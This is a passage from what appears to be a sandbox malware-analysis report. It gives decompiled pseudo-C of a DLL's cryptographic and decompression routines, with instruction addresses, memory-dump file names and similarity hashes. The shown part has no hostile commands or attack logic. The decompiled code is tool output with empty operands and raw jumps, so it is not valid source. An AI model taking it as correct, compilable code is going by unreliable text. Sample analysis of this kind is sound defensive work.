				_t227 = __r9 + _t221;
				E000007FE7FEF30F24C0();
				E000007FE7FEF30F1E10();
				E000007FE7FEF3064FDE( &_v360, _v648, _v640);
				if (_t122 != 0) goto 0xf3064546;
				_t213 = _a56;
				_t158 = _a48;
				_t266 = _t265 + 0x110;
				_t86 =  *0xf319cfcc; // 0x0
				asm("bt eax, 0x19");
				_v672 = __rcx;
				if (_t122 >= 0) goto 0xf306462c;
				_t123 =  *0xf319cfcb & 0x00000001;
				if (_t123 == 0) goto 0xf306462c;
				if (_t123 == 0) goto 0xf306462c;
				if ((_t86 & 0x10400000) != 0x10400000) goto 0xf306462c;
				_v736 =  &_v360;
				_t143 =  &_v712;
				_v744 = _t143;
				0xf30c76c0();
				if (_t143 - _t213 > 0) goto 0xf30649b7;
				_t159 = _t158 + _t143;
				goto 0xf306462f;
				_t263 = _t213;
				_t223 = _t263 & 0xfffffff0;
				_t214 =  <  ? _t223 : _t213;
				_t127 = _t214;
				if (_t127 == 0) goto 0xf306473a;
				if (_t127 < 0) goto 0xf3064948;
				_t128 = _t214 - _t263 - _t227;
				if (_t128 > 0) goto 0xf306495c;
				_t145 = _t214 & 0x0000000f;
				_v728 = _t145;
				if (_t128 != 0) goto 0xf306496d;
				_t268 = _t158 + _t143 + _t227;
				asm("bt ecx, 0x9");
				asm("bt ecx, 0x19");
				_t147 =  <  ? _t158 : _t145 | 0x00000002;
				_t129 = ( <  ? _t158 : _t145 | 0x00000002) - 1;
				if (( <  ? _t158 : _t145 | 0x00000002) == 1) goto 0xf30646c7;
				if ((0 | _t128 >= 0x00000000) != 2) goto 0xf30646e4;
				_v744 =  &_v712;
				E000007FE7FEF30C85B0(_t104, 1, 0, 0xc00, 0x10, 0, _t118, _t158 + _t143, _t158 + _t143 + _t227, _t158 + _t143 + _t227, _t214, _t223, _t227, _t214 >> 4, _t265 + 0x110, _t256);
				goto 0xf30646ff;
				_v744 =  &_v712;
				0xf30c8eb0();
				goto 0xf30646ff;
				_v744 =  &_v712;
				E000007FE7FEF30E6840(_t158 + _t143 + _t227, _t268, _t223, _t227, _t214 >> 4, _t266, _t266);
				asm("bswap eax");
				asm("bswap eax");
				_v700 = _v700 + r12d;
				0xf306505c();
				_t152 = _t223 - _t227 + _t214;
				_t215 =  <  ? _t152 : _t214;
				_t132 =  <  ? _t152 : _t214;
				if (_t132 != 0) goto 0xf306464d;
				if (_t132 == 0) goto 0xf306485f;
				asm("xorps xmm0, xmm0");
				_t216 =  &_v648;
				asm("movaps [edi], xmm0");
				E000007FE7FEF30F1E10();
				_t224 =  *_t216;
				_t217 =  *((intOrPtr*)(_t216 + 8));
				asm("bt eax, 0x9");
				asm("bt eax, 0x19");
				_t153 =  >=  ? _t216 | 0x00000002 : _t152;
				if (_t153 == 1) goto 0xf30647b4;
				if (1 != 2) goto 0xf30647d3;
				asm("movups xmm0, [esp+0x40]");
				asm("movaps [ecx], xmm0");
				E000007FE7FEF30C84E0(_t104, 0 | _t132 >= 0x00000000, 0, 0xc00, 0x10, 0, _t118, 1 - 2, _t159 + _t223,  &_v648,  &_v728, _t217, _t224, _t227 + _t214, _t266, _t266, _t256);
				goto 0xf30647f0;
				asm("movups xmm0, [esp+0x40]");
				asm("movaps [ecx], xmm0");
				E000007FE7FEF30C8B00();
				goto 0xf30647f0;
				asm("movups xmm0, [esp+0x40]");
				asm("movaps [ecx], xmm0");
				E000007FE7FEF30E6A00( &_v648,  &_v728, _t266);
				_v728 = _v728 ^ _t224;
				_v720 = _v720 ^ _t217;
				asm("movaps xmm0, [esp+0x30]");
				asm("movaps [edi], xmm0");
				r8d = 0x10;
				E000007FE7FEF30F24C0();
				asm("movaps xmm0, [edi]");
				asm("movaps [esp+0x30], xmm0");
				E000007FE7FEF3064FDE( &_v360, _v728, _v720);
				asm("movaps xmm0, [esp+0x30]");
				asm("movaps [esp+0x70], xmm0");
				asm("movaps [edi], xmm0");
				E000007FE7FEF30F1E10();
				asm("dec eax");
				asm("dec ecx");
				_t225 =  &_v360;
				_t183 = _t225;
				E000007FE7FEF3064FDE(_t183, _a40 << 3, _a56 << 3);
				_t219 =  *_t225;
				_t226 =  *((intOrPtr*)(_t225 + 8));
				asm("bt eax, 0x9");
				asm("bt eax, 0x19");
				_t154 =  >=  ? _t183 | 0x00000002 : _t153;
				_t135 = ( >=  ? _t183 | 0x00000002 : _t153) - 1;
				if (( >=  ? _t183 | 0x00000002 : _t153) == 1) goto 0xf30648e3;
				if (1 != 2) goto 0xf3064902;
				asm("movaps xmm0, [esp+0x50]");
				asm("movaps [ecx], xmm0");
				E000007FE7FEF30C84E0(_t104, 0xbadbad, 0, 0xc00, 0x10, 0, _t118, 1 - 2, _v672,  &_v648,  &_v728, _t219, _t226, _t227 + _t214, _t266, _t266, _t256);
				goto 0xf306491f;
				asm("movaps xmm0, [esp+0x50]");
				asm("movaps [ecx], xmm0");
				E000007FE7FEF30C8B00();
				goto 0xf306491f;
				asm("movaps xmm0, [esp+0x50]");
				asm("movaps [ecx], xmm0");
				_t103 = E000007FE7FEF30E6A00( &_v648,  &_v728, _t266);
				_v728 = _v728 ^ _t219;
				_v720 = _v720 ^ _t226;
				asm("movups xmm0, [esp+0x30]");
				asm("movups [ebx], xmm0");
				return _t103;
			}

0x7fef306449d
0x7fef30644a9
0x7fef30644b4
0x7fef30644bb
0x7fef30644c0
0x7fef30644cd
0x7fef30644d6
0x7fef30644de
0x7fef30644e2
0x7fef30644f2
0x7fef30644f5
0x7fef30644f9
0x7fef30644fd
0x7fef3064503
0x7fef3064518
0x7fef306451e
0x7fef306452c
0x7fef306454f
0x7fef3064553
0x7fef306455a
0x7fef306455e
0x7fef3064564
0x7fef3064568
0x7fef3064579
0x7fef3064587
0x7fef306459f
0x7fef30645aa
0x7fef30645ac
0x7fef30645b4
0x7fef30645bc
0x7fef30645c3
0x7fef30645c9
0x7fef30645cd
0x7fef30645d2
0x7fef30645d4
0x7fef30645db
0x7fef30645e2
0x7fef30645ee
0x7fef30645f8
0x7fef30645fd
0x7fef3064602
0x7fef3064613
0x7fef306461b
0x7fef3064621
0x7fef306462a
0x7fef306462c
0x7fef3064632
0x7fef306463e
0x7fef3064642
0x7fef3064645
0x7fef3064653
0x7fef3064659
0x7fef306465c
0x7fef3064665
0x7fef3064669
0x7fef306466e
0x7fef3064674
0x7fef3064680
0x7fef306468b
0x7fef3064694
0x7fef306469f
0x7fef30646a3
0x7fef30646a8
0x7fef30646af
0x7fef30646c0
0x7fef30646c5
0x7fef30646cc
0x7fef30646dd
0x7fef30646e2
0x7fef30646e9
0x7fef30646fa
0x7fef3064703
0x7fef3064708
0x7fef306470a
0x7fef306471c
0x7fef3064727
0x7fef306472d
0x7fef3064731
0x7fef3064734
0x7fef306473e
0x7fef3064747
0x7fef306474a
0x7fef3064752
0x7fef306475e
0x7fef3064763
0x7fef3064766
0x7fef3064772
0x7fef306477d
0x7fef3064786
0x7fef306478e
0x7fef3064793
0x7fef3064795
0x7fef30647a2
0x7fef30647ad
0x7fef30647b2
0x7fef30647b4
0x7fef30647c1
0x7fef30647cc
0x7fef30647d1
0x7fef30647d3
0x7fef30647e0
0x7fef30647eb
0x7fef30647f0
0x7fef30647f5
0x7fef30647fa
0x7fef3064807
0x7fef306480a
0x7fef3064820
0x7fef3064825
0x7fef3064828
0x7fef306483f
0x7fef3064844
0x7fef3064849
0x7fef306484e
0x7fef306485a
0x7fef3064877
0x7fef306487a
0x7fef306487d
0x7fef3064885
0x7fef3064888
0x7fef306488d
0x7fef3064890
0x7fef306489c
0x7fef30648a7
0x7fef30648b0
0x7fef30648b4
0x7fef30648bd
0x7fef30648c2
0x7fef30648c4
0x7fef30648d1
0x7fef30648dc
0x7fef30648e1
0x7fef30648e3
0x7fef30648f0
0x7fef30648fb
0x7fef3064900
0x7fef3064902
0x7fef306490f
0x7fef306491a
0x7fef306491f
0x7fef3064924
0x7fef3064929
0x7fef306492e
0x7fef3064947

Memory Dump Source

Source File: 00000001.00000002.915284627.000007FEF3041000.00000020.00000001.01000000.00000003.sdmp, Offset: 000007FEF3040000, based on PE: true

Associated: 00000001.00000002.915280675.000007FEF3040000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915354749.000007FEF3101000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915485518.000007FEF3169000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915525428.000007FEF319C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915532692.000007FEF319F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7fef3040000_loaddll64.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f7d7967c6bc13ef0be2880cd345baedb93773dd3607f78bf569f78e9ec2c44e0
Instruction ID: 9bee23e17ff37c0481650398b316869bb8b8e16aac9daab7338d1cb731bc812d
Opcode Fuzzy Hash: f7d7967c6bc13ef0be2880cd345baedb93773dd3607f78bf569f78e9ec2c44e0
Instruction Fuzzy Hash: E1D1DB36B1CAC299EAA19B15E0413FAA3A2F7957C4F504123EE8D53B69EF3CD145E700

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF305FA3F Relevance: .3, Instructions: 321
COMMONCrypto

Download Yara Rule

C-Code - Quality: 55%

			E000007FE7FEF305FA3F(char __ebx, signed int __ecx, signed int __esi, void* __rcx, signed int __rdx, void* __r8, signed int __r9, void* __r10, void* __r11, void* __r12, signed long long __r13, void* __r14, signed int __r15) {
				signed int _t503;
				signed int _t505;
				signed int _t508;
				signed int _t513;
				signed int _t517;
				signed char _t518;
				signed char _t519;
				signed int _t521;
				signed int _t522;
				signed int _t523;
				signed char _t524;
				signed char _t531;
				signed int _t539;
				signed int _t542;
				signed int _t545;
				unsigned int _t550;
				signed int _t551;
				short _t553;
				signed int _t567;
				signed short _t569;
				signed int _t570;
				signed int _t572;
				signed int _t580;
				signed short _t582;
				signed char _t591;
				signed int _t597;
				signed int _t600;
				unsigned int _t604;
				signed int _t633;
				signed char _t635;
				signed int _t639;
				signed char _t640;
				signed int _t649;
				signed char _t659;
				char _t661;
				signed char _t664;
				signed char _t668;
				signed char _t669;
				signed char _t672;
				unsigned int _t691;
				signed int _t692;
				short _t694;
				signed char _t709;
				signed char _t711;
				signed int _t715;
				signed int _t716;
				signed char _t718;
				signed char _t724;
				signed int _t728;
				signed char _t732;
				signed int _t735;
				signed char _t754;
				unsigned int _t761;
				signed char _t763;
				signed int _t773;
				signed int _t786;
				signed int _t799;
				signed int _t800;
				signed int _t806;
				signed int _t812;
				signed short _t814;
				signed int _t816;
				signed short _t819;
				signed int _t824;
				signed int _t825;
				signed short _t828;
				void* _t832;
				signed int _t835;
				signed int _t841;
				signed int _t848;
				signed int _t851;
				signed int _t854;
				signed char _t856;
				signed int _t863;
				signed int _t879;
				signed int _t881;
				signed int _t905;
				signed int _t908;
				void* _t920;
				void* _t923;
				void* _t926;
				void* _t937;
				signed short _t948;
				void* _t953;
				void* _t956;
				void* _t979;
				signed int _t989;
				void* _t991;
				void* _t1020;
				short _t1028;
				void* _t1033;
				signed int _t1061;
				signed int _t1062;
				void* _t1066;
				void* _t1069;
				void* _t1071;
				signed int _t1079;
				intOrPtr _t1082;
				void* _t1087;
				signed long long _t1090;
				signed long long _t1094;
				signed long long _t1095;
				signed long long _t1101;
				signed long long _t1102;
				long long _t1118;
				signed int _t1127;
				signed long long _t1128;
				signed long long _t1129;
				signed long long _t1133;
				signed long long _t1134;
				signed long long _t1135;
				signed long long _t1136;
				signed long long _t1137;
				signed long long _t1138;
				signed long long _t1139;
				signed long long _t1141;
				void* _t1142;
				long long* _t1149;
				unsigned long long _t1151;
				signed long long _t1153;
				unsigned long long _t1156;
				unsigned long long _t1160;
				void* _t1164;
				long long _t1165;
				signed long long _t1167;
				signed long long _t1171;
				signed long long _t1172;
				signed long long _t1185;
				signed long long _t1189;
				intOrPtr _t1197;
				void* _t1199;
				long long _t1202;
				signed long long _t1203;
				intOrPtr _t1204;
				signed long long _t1206;
				signed long long _t1211;
				signed char* _t1219;
				signed long long _t1222;
				unsigned long long _t1226;
				signed long long _t1230;
				unsigned long long _t1231;
				signed long long _t1239;
				unsigned long long _t1242;
				unsigned long long _t1243;
				intOrPtr _t1252;
				signed long long _t1257;
				unsigned long long _t1259;
				signed long long _t1266;
				signed long long _t1267;
				signed long long _t1271;
				signed long long _t1275;
				signed long long _t1279;
				intOrPtr _t1280;
				void* _t1282;
				signed long long _t1291;
				void* _t1296;
				signed long long _t1299;
				long long _t1300;
				void* _t1301;
				signed long long _t1304;
				signed char* _t1309;
				signed char* _t1316;
				signed char* _t1321;
				signed long long _t1324;
				signed long long _t1325;
				signed long long _t1326;
				signed long long _t1328;
				void* _t1333;
				signed long long _t1344;
				void* _t1346;
				signed long long _t1351;
				signed long long _t1352;
				void* _t1353;
				void* _t1354;
				long long _t1355;
				void* _t1359;
				signed long long _t1362;
				void* _t1364;
				intOrPtr _t1371;
				intOrPtr _t1374;
				long long _t1377;
				signed char* _t1380;
				intOrPtr _t1383;
				intOrPtr _t1384;
				intOrPtr _t1385;
				intOrPtr _t1386;
				intOrPtr _t1387;
				intOrPtr _t1389;
				signed long long _t1390;
				intOrPtr _t1394;
				long long _t1397;
				signed char* _t1400;
				signed long long _t1408;
				signed char* _t1411;
				intOrPtr* _t1415;
				signed char* _t1419;
				signed char* _t1420;
				signed char* _t1421;
				signed char* _t1422;
				signed char* _t1423;
				void* _t1427;
				void* _t1430;
				void* _t1431;
				void* _t1435;
				void* _t1436;
				signed int* _t1437;
				signed long long _t1443;

				 *(_t1346 + 0x40) = 0;
				r12d = __ecx & 0x0000ffff;
				r12d = r12d | 0x00001900;
				if (r12b == 0) goto 0xf305f8f6;
				if ((r12b & 0xffffffff) == 1) goto 0xf30606d0;
				_t503 =  *(_t1346 + 0x38);
				 *(_t1346 + 0x30) =  *(_t1346 + 0x30) >> (_t503 & 0x00000007);
				 *(_t1346 + 0x38) = _t503 & 0xfffffff8;
				 *(_t1346 + 0x40) = 0;
				r12b = 5;
				_t505 =  *(_t1346 + 0x40);
				_t806 =  *(_t1346 + 0x50);
				if (_t505 - 4 >= 0) goto 0xf3060587;
				_t659 =  *(_t1346 + 0x38);
				if (_t659 == 0) goto 0xf305faf2;
				if (_t659 - 8 >= 0) goto 0xf305fb09;
				if (__r14 == __r15) goto 0xf305fae4;
				_t1211 = __rdx << _t659;
				_t1151 =  *(_t1346 + 0x30) | _t1211;
				 *(_t1346 + 0x30) = _t1151;
				 *(_t1346 + 0x38) = _t659 + 8;
				r12d = 0;
				_t1415 = __r14 + 1;
				goto 0xf305faea;
				r12d = _t806;
				if ((r12b & 0x00000002) == 0) goto 0xf305fab9;
				goto 0xf305fb37;
				if (_t1415 == __r15) goto 0xf305fb31;
				_t661 =  *_t1415;
				 *((char*)(__r10 + _t1211 + 0x291d)) = _t661;
				goto 0xf305fb26;
				 *(_t1346 + 0x30) = _t1151 >> 8;
				 *(_t1346 + 0x38) = _t661 + 0xfffffff8;
				 *((char*)(__r10 + __rcx + 0x291d)) = __ebx;
				 *(_t1346 + 0x40) = _t505 + 1;
				r12d = 0;
				goto 0xf305fb37;
				r12d = _t806;
				if (r12b == 0) goto 0xf305faa0;
				if ((r12b & 0xffffffff) == 1) goto 0xf30606d0;
				r12b = 0x14;
				if ( *(_t1346 + 0x40) == 0) goto 0xf305f43b;
				r12b = 7;
				_t920 = __r8 -  *((intOrPtr*)(_t1346 + 0x1a8));
				if (_t920 != 0) goto 0xf305f43b;
				_t1296 = __r15 - __r15;
				if (_t920 == 0) goto 0xf30611fa;
				_t1082 =  *((intOrPtr*)(_t1346 + 0x1a8));
				_t1278 =  >=  ? _t1296 : _t1082 - __r8;
				_t1279 =  >=  ? __r15 :  >=  ? _t1296 : _t1082 - __r8;
				_t923 = _t1279 - _t1296;
				if (_t923 > 0) goto 0xf3061395;
				_t1153 = _t1279 + __r8;
				if (_t923 < 0) goto 0xf30613a4;
				if (_t1153 - _t1082 > 0) goto 0xf30613b3;
				E000007FE7FEF30F1E10();
				_t1419 =  <=  ? __r15 : __r15 + _t1279;
				_t863 =  *(_t1346 + 0x40) - _t806;
				 *(_t1346 + 0x40) = _t863;
				r12b = 6;
				_t1351 = _t1153;
				_t1383 =  *((intOrPtr*)(_t1346 + 0x58));
				 *(_t1346 + 0x70) = _t1351;
				_t664 =  *(_t1346 + 0x38);
				r8d =  *(_t1346 + 0x40);
				_t926 = r8d - 3;
				if (_t926 >= 0) goto 0xf30605ce;
				 *(_t1346 + 0x80) = 0x5;
				 *(_t1346 + 0x88) = 4;
				r9d = r8d;
				_t508 =  *(_t1346 + 0x80 + __r9 * 4);
				_t1316 = _t1419;
				if (_t926 >= 0) goto 0xf305fc89;
				if (_t1316 == __r15) goto 0xf305fc7b;
				_t635 =  *_t1316 & 0x000000ff;
				_t1156 =  *(_t1346 + 0x30) << _t664 |  *(_t1346 + 0x30);
				 *(_t1346 + 0x30) = _t1156;
				 *(_t1346 + 0x38) = _t664 + 8;
				r12d = 0;
				_t1420 =  &(_t1316[1]);
				goto 0xf305fc81;
				r12d =  *(_t1346 + 0x50);
				if ((r12b & 0x00000002) == 0) goto 0xf305fc4c;
				goto 0xf305fcc8;
				 *(_t1346 + 0x30) = _t1156 >> _t508;
				 *(_t1346 + 0x38) = _t664 - _t508;
				 *((intOrPtr*)(_t1383 + 0x30 + __r9 * 4)) = ( *(0xf311f0f8 + __r9 * 2) & 0x0000ffff) + (__esi &  !_t863);
				r8d = r8d + 1;
				 *(_t1346 + 0x40) = r8d;
				r12d = 0;
				if (r12b == 0) goto 0xf305fc10;
				r12d = r12d >> 8;
				if ((r12b & 0xffffffff) == 1) goto 0xf30605fb;
				if ( *(_t1346 + 0x40) -  *(_t1383 + 0x38) >= 0) goto 0xf305fd3a;
				_t668 =  *(_t1346 + 0x38);
				_t1321 = _t1420;
				if (_t668 - 3 >= 0) goto 0xf305fd6b;
				if (_t1321 == __r15) goto 0xf305fd2c;
				_t1160 =  *(_t1346 + 0x30) | __r15 << _t668;
				 *(_t1346 + 0x30) = _t1160;
				_t669 = _t668 + 8;
				 *(_t1346 + 0x38) = _t669;
				r12d = 0;
				_t1421 =  &(_t1321[1]);
				goto 0xf305fd32;
				r12d =  *(_t1346 + 0x50);
				if ((r12b & 0x00000002) == 0) goto 0xf305fd01;
				goto 0xf305fda6;
				 *(_t1383 + 0x38) = 0x13;
				_t1299 = _t1351;
				_t513 = E000007FE7FEF3061920(0xf311f0f8, _t1383, _t1346 + 0x30, _t1351, _t1383);
				_t1352 = _t1299;
				_t1394 =  *((intOrPtr*)(_t1346 + 0x1a0));
				_t1384 =  *((intOrPtr*)(_t1346 + 0x58));
				r12d = _t513;
				goto 0xf305fda6;
				 *(_t1346 + 0x30) = _t1160 >> 3;
				 *(_t1346 + 0x38) = _t669 + 0xfffffffd;
				if (_t513 - 0x13 >= 0) goto 0xf30612c6;
				 *(_t1384 + 0x7fef31212c4) = _t635 & 0x00000007;
				 *(_t1346 + 0x40) = _t513 + 1;
				r12d = 0;
				if (r12b == 0) goto 0xf305fceb;
				_t937 = (r12b & 0xffffffff) - 1;
				if (_t937 == 0) goto 0xf30606d0;
				_t672 =  *(_t1346 + 0x38);
				_t1219 = _t1421;
				if (_t937 >= 0) goto 0xf30604e6;
				if (_t1219 == __r15) goto 0xf305fe03;
				_t1324 = __r15 << _t672;
				 *(_t1346 + 0x30) =  *(_t1346 + 0x30) | _t1324;
				 *(_t1346 + 0x38) = _t672 + 8;
				_t1422 =  &(_t1219[1]);
				goto 0xf305fe08;
				if ((bpl & 0x00000002) == 0) goto 0xf305fdd5;
				_t1222 =  *((intOrPtr*)(_t1346 + 0x1a8));
				_t1185 = __r15 - _t1422;
				if (_t1185 - 4 < 0) goto 0xf306060d;
				_t1087 = _t1222 - _t1352;
				if (_t1087 - 2 < 0) goto 0xf306060d;
				if (_t1087 - 0x103 < 0) goto 0xf305fe4d;
				if (_t1185 - 0xd > 0) goto 0xf3060750;
				_t517 =  *(_t1346 + 0x38);
				if (_t1087 - 0x1e >= 0) goto 0xf305fe76;
				_t1423 =  &(_t1422[4]);
				 *(_t1346 + 0x30) = _t1222 << _t517 |  *(_t1346 + 0x30);
				_t518 = _t517 + 0x20;
				 *(_t1346 + 0x38) = _t518;
				goto 0xf305fe7b;
				_t812 =  *((short*)(_t1384 + 0x3c + _t1185 * 2));
				if (_t812 < 0) goto 0xf305fea3;
				if ((_t812 & 0x0000ffff) - 0x200 < 0) goto 0xf306073e;
				goto 0xf305fecf;
				asm("dec eax");
				asm("adc edi, 0x0");
				if ( !_t812 - 0x23f > 0) goto 0xf30611c7;
				_t814 =  *((short*)(_t1384 + 0x83c + _t1279 * 2));
				_t948 = _t814;
				if (_t948 < 0) goto 0xf305fea8;
				 *(_t1346 + 0x40) = _t814 & 0x0000ffff;
				_t1226 =  *(_t1346 + 0x30) >> 0xb;
				 *(_t1346 + 0x30) = _t1226;
				_t519 = _t518 - 0xb;
				 *(_t1346 + 0x38) = _t519;
				r12b = 0x15;
				asm("bt edi, 0x8");
				if (_t948 < 0) goto 0xf305f43b;
				_t841 =  *((short*)(_t1384 + 0x3c + _t1185 * 2));
				if (_t841 < 0) goto 0xf305ff16;
				if ((_t841 & 0x0000ffff) - 0x200 < 0) goto 0xf306073e;
				goto 0xf305ff42;
				asm("dec eax");
				asm("adc esi, 0x0");
				if ( !_t841 - 0x23f > 0) goto 0xf3061207;
				if ( *((short*)(_t1384 + 0x83c + _t1299 * 2)) < 0) goto 0xf305ff1b;
				 *(_t1346 + 0x30) = _t1226 >> 0xb;
				 *(_t1346 + 0x38) = _t519 - 0xb;
				_t953 = _t1352 -  *((intOrPtr*)(_t1346 + 0x1a8));
				if (_t953 >= 0) goto 0xf3061284;
				 *((intOrPtr*)(_t1394 + _t1352)) = dil;
				asm("bt esi, 0x8");
				if (_t953 < 0) goto 0xf3060a8e;
				if (_t1352 + 1 -  *((intOrPtr*)(_t1346 + 0x1a8)) >= 0) goto 0xf30612a2;
				 *((intOrPtr*)(_t1394 + _t1352 + 1)) = sil;
				_t1353 = _t1352 + 2;
				_t521 =  *(_t1346 + 0x40);
				r12b = 0x15;
				if (_t521 - 0xff > 0) goto 0xf305f43b;
				_t956 = _t1353 -  *((intOrPtr*)(_t1346 + 0x1a8));
				if (_t956 == 0) goto 0xf3061262;
				if (_t956 >= 0) goto 0xf3061284;
				 *(_t1394 + _t1353) = _t521;
				_t1354 = _t1353 + 1;
				r12b = 0xc;
				_t522 =  *(_t1346 + 0x38);
				if (_t522 - 0xe > 0) goto 0xf30600a1;
				_t1189 = __r15 - _t1423;
				if (_t1189 - 1 > 0) goto 0xf3060085;
				_t691 =  *((short*)(_t1384 + 0xddc + _t1189 * 2));
				if (_t691 < 0) goto 0xf3060019;
				if ((_t691 & 0x0000ffff) - 0x200 < 0) goto 0xf3060056;
				_t692 = _t691 >> 9;
				if (_t522 - _t692 < 0) goto 0xf3060056;
				goto 0xf30600a1;
				if (_t522 - 0xb < 0) goto 0xf3060056;
				asm("dec eax");
				asm("adc ecx, 0x0");
				if ( !_t692 - 0x23f > 0) goto 0xf30611b9;
				_t694 =  *((short*)(_t1384 + 0x15dc + _t1189 * 2));
				if (_t694 >= 0) goto 0xf3060051;
				if (_t522 - 0xc >= 0) goto 0xf3060023;
				if (_t694 >= 0) goto 0xf30600a1;
				if (_t1423 == __r15) goto 0xf3060156;
				_t1325 = _t1324 << _t522;
				_t1230 =  *(_t1346 + 0x30) | _t1325;
				 *(_t1346 + 0x30) = _t1230;
				_t523 = _t522 + 8;
				 *(_t1346 + 0x38) = _t523;
				if (_t523 - 0xe <= 0) goto 0xf305ffed;
				goto 0xf30600a1;
				_t1326 = _t1325 << _t523;
				_t1231 = _t1230 | _t1326;
				 *(_t1346 + 0x30) = _t1231;
				_t524 = _t523 + 0x10;
				 *(_t1346 + 0x38) = _t524;
				_t816 =  *((short*)(_t1384 + 0xddc + _t1189 * 2));
				if (_t816 < 0) goto 0xf30600c3;
				goto 0xf30600ef;
				asm("dec eax");
				asm("adc edi, 0x0");
				if ( !(_t816 & 0x000001ff) - 0x23f > 0) goto 0xf30611c7;
				_t819 =  *((short*)(_t1384 + 0x15dc + _t1279 * 2));
				if (_t819 < 0) goto 0xf30600c8;
				if (0xa == 0) goto 0xf30606cb;
				 *(_t1346 + 0x30) = _t1231 >> 0xb;
				 *(_t1346 + 0x38) = _t524 - 0xb;
				if ((_t819 & 0x0000ffff) - 0x1d > 0) goto 0xf306013e;
				 *(_t1346 + 0x44) =  *(_t1279 + 0xf311ef48) & 0x000000ff;
				 *(_t1346 + 0x3c) =  *(0xf311ef68 + _t1279 * 2) & 0x0000ffff;
				_t707 =  ==  ? 0x1601 : 0x1001;
				r12d = 0x2101;
				r12d = r12d & 0x00003700;
				_t975 =  ==  ? 0x1601 : 0x1001;
				if (( ==  ? 0x1601 : 0x1001) == 0) goto 0xf305ffd4;
				goto 0xf3060485;
				r12d =  *(_t1346 + 0x7c);
				goto 0xf3060149;
				_t709 =  *(_t1346 + 0x38);
				_t639 =  *(_t1346 + 0x50);
				if (_t709 - 8 >= 0) goto 0xf3060565;
				if (__r15 == __r15) goto 0xf306019f;
				 *(_t1346 + 0x30) =  *(_t1346 + 0x30) | _t1326 << _t709;
				 *(_t1346 + 0x38) = _t709 + 8;
				_t1427 = __r15 + 1;
				goto 0xf30601a4;
				if ((bpl & 0x00000002) == 0) goto 0xf3060172;
				_t1090 =  *((intOrPtr*)(_t1346 + 0x1a8));
				_t979 = _t1354 - _t1090;
				if (_t979 == 0) goto 0xf3061238;
				if (_t979 >= 0) goto 0xf3061284;
				 *((char*)(_t1394 + _t1354)) =  *(_t1346 + 0x3c);
				_t1355 = _t1354 + 1;
				r12d = 0x11;
				r12d =  ==  ? 6 : r12d;
				 *(_t1346 + 0x40) =  *(_t1346 + 0x40) - 1;
				r12d =  ==  ? 6 : r12d;
				 *(_t1346 + 0x70) = __r13;
				r13d =  *(_t1346 + 0x3c);
				_t1328 =  *((intOrPtr*)(_t1346 + 0x1a8));
				if (_t1355 == _t1328) goto 0xf3060b97;
				_t1164 = _t1328 - _t1355;
				_t1300 = _t1355;
				_t1165 =  >=  ? _t1090 : _t1164;
				 *((long long*)(_t1346 + 0x28)) =  *(_t1346 + 0xb8);
				 *((long long*)(_t1346 + 0x20)) = _t1165;
				_t1377 = _t1300;
				E000007FE7FEF30616A0();
				_t1385 =  *((intOrPtr*)(_t1346 + 0x58));
				_t1359 = _t1300 + _t1165;
				r12b = 0xc;
				 *(_t1346 + 0x40) =  *(_t1346 + 0x40) - _t639;
				if (_t1164 != _t1090) goto 0xf3060208;
				_t1408 =  *(_t1346 + 0x70);
				r12b = 3;
				if ( *((intOrPtr*)(_t1385 + 0x18)) == 0) goto 0xf305f43b;
				_t711 =  *(_t1346 + 0x38);
				_t1280 =  *((intOrPtr*)(_t1346 + 0xe0));
				_t879 =  >=  ? r14d : _t711 >> 3;
				_t640 = _t1328 * 8;
				_t531 = (_t711 & 0xfffffff8) - _t640;
				 *(_t1346 + 0x38) = _t531;
				_t1430 = _t1427 - __r15 + _t1280 - _t1328;
				if (_t1430 - _t1280 > 0) goto 0xf30613c7;
				_t1431 = _t1430 + _t1408;
				 *(_t1346 + 0x30) =  !(0xffffffff << (_t531 & 0x00000038)) &  *(_t1346 + 0x30) >> (_t711 & 0x00000007);
				r12b = 0x18;
				if (( *(_t1346 + 0x1b8) & 0x00000001) == 0) goto 0xf305f43b;
				 *(_t1346 + 0x40) = 0;
				r12b = 0x17;
				_t715 =  *(_t1346 + 0x40) & 0x000001ff;
				 *(_t1346 + 0x40) = _t715;
				r12b = 0x14;
				if (_t715 == 0x100) goto 0xf305f43b;
				r12b = 0x20;
				if (_t715 - 0x11d > 0) goto 0xf305f43b;
				_t716 =  *(_t1090 + 0xf311eee8) & 0x000000ff;
				_t989 = _t716;
				r12b = _t989 == 0;
				 *(_t1346 + 0x44) = _t716;
				 *(_t1346 + 0x40) =  *(0xf311ef08 + _t1090 * 2) & 0x0000ffff;
				r12b = r12b | 0x0000000e;
				r9d =  *(_t1346 + 0x3c);
				if (_t989 >= 0) goto 0xf3060382;
				r12b = 0x1d;
				if ( *((intOrPtr*)(_t1346 + 0xf4)) != 0) goto 0xf305f43b;
				_t1301 = _t1359 + 0xf311ef08;
				_t1239 =  *((intOrPtr*)(_t1346 + 0x1a8));
				_t991 = _t1301 - _t1239;
				if (_t991 > 0) goto 0xf30603b1;
				_t1094 = (_t1359 - _t1377 &  *(_t1346 + 0xb8)) - _t1359;
				if (_t991 < 0) goto 0xf3060a9a;
				if (_t1094 - 0xf311ef08 >= 0) goto 0xf3060a9a;
				r12d = 0x13;
				r12d =  ==  ? 0xc : r12d;
				_t539 =  *(_t1346 + 0x40);
				_t824 =  *(_t1346 + 0x50);
				if (_t539 - 3 > 0) goto 0xf3060605;
				_t718 =  *(_t1346 + 0x38);
				if (_t718 == 0) goto 0xf3060421;
				_t1333 = _t1431;
				if (_t718 - 8 >= 0) goto 0xf3060436;
				if (_t1333 == __r15) goto 0xf3060413;
				_t1167 =  *(_t1346 + 0x30) | _t1239 << _t718;
				 *(_t1346 + 0x30) = _t1167;
				 *(_t1346 + 0x38) = _t718 + 8;
				r12d = 0;
				goto 0xf3060419;
				r12d = _t824;
				if ((r12b & 0x00000002) == 0) goto 0xf30603e8;
				goto 0xf306046a;
				if (_t1333 + 1 == __r15) goto 0xf3060464;
				goto 0xf3060453;
				_t1242 = _t1167 >> 8;
				 *(_t1346 + 0x30) = _t1242;
